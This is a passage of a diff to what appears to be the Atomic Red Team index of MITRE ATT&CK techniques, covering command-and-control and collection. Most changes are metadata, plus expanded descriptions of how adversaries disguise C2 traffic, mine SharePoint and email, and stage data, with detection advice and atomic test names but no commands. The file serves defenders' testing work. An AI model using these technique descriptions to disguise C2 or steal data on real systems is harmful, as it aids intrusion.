       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests:
     - name: Testing usage of uncommonly used port with PowerShell
@@ -77440,7 +77919,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests:
     - name: OpenSSL C2
@@ -77504,7 +77982,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -77541,8 +78019,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -77596,7 +78072,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -77668,7 +78143,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests:
     - name: ICMP C2
@@ -77756,28 +78230,8 @@ command-and-control:
         name: powershell
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -77785,23 +78239,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -77848,7 +78340,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -77908,7 +78399,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -77940,7 +78430,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -77966,8 +78456,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -78034,7 +78522,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests:
     - name: Malicious User Agents - Powershell
@@ -78209,7 +78696,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests:
     - name: rsync remote file copy (push)
@@ -79598,7 +80084,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -79622,7 +80107,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -79645,8 +80130,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests:
     - name: Steganographic Tarball Embedding
@@ -79847,7 +80330,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -79867,8 +80350,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -79922,7 +80403,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests:
     - name: Connection Proxy
@@ -80058,7 +80538,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -80084,8 +80564,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -80139,7 +80617,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -80215,7 +80692,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests:
     - name: Compress Data for Exfiltration With Rar
@@ -80724,7 +81200,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests:
     - name: Screencapture
@@ -81067,7 +81542,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -81146,7 +81620,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests:
     - name: Input Capture
@@ -81465,7 +81938,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -81480,30 +81953,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -81512,13 +81965,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -81532,20 +81989,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -81588,7 +82062,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests:
     - name: using device audio capture commandlet
@@ -81670,7 +82143,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -81690,22 +82163,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -81722,11 +82197,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -81742,37 +82216,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -81784,22 +82249,41 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests:
     - name: Identify Documents on USB and Removable Media via PowerShell
@@ -81826,55 +82310,54 @@ collection:
           '
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests:
     - name: Stage data from Discovery.bat
@@ -81983,7 +82466,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -82007,8 +82490,6 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests:
     - name: Email Collection with PowerShell Get-Inbox
@@ -82053,7 +82534,7 @@ collection:
         name: powershell
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -82074,6 +82555,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -82097,8 +82579,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -82123,7 +82607,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests:
     - name: Automated Collection Command Prompt
@@ -82258,7 +82741,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
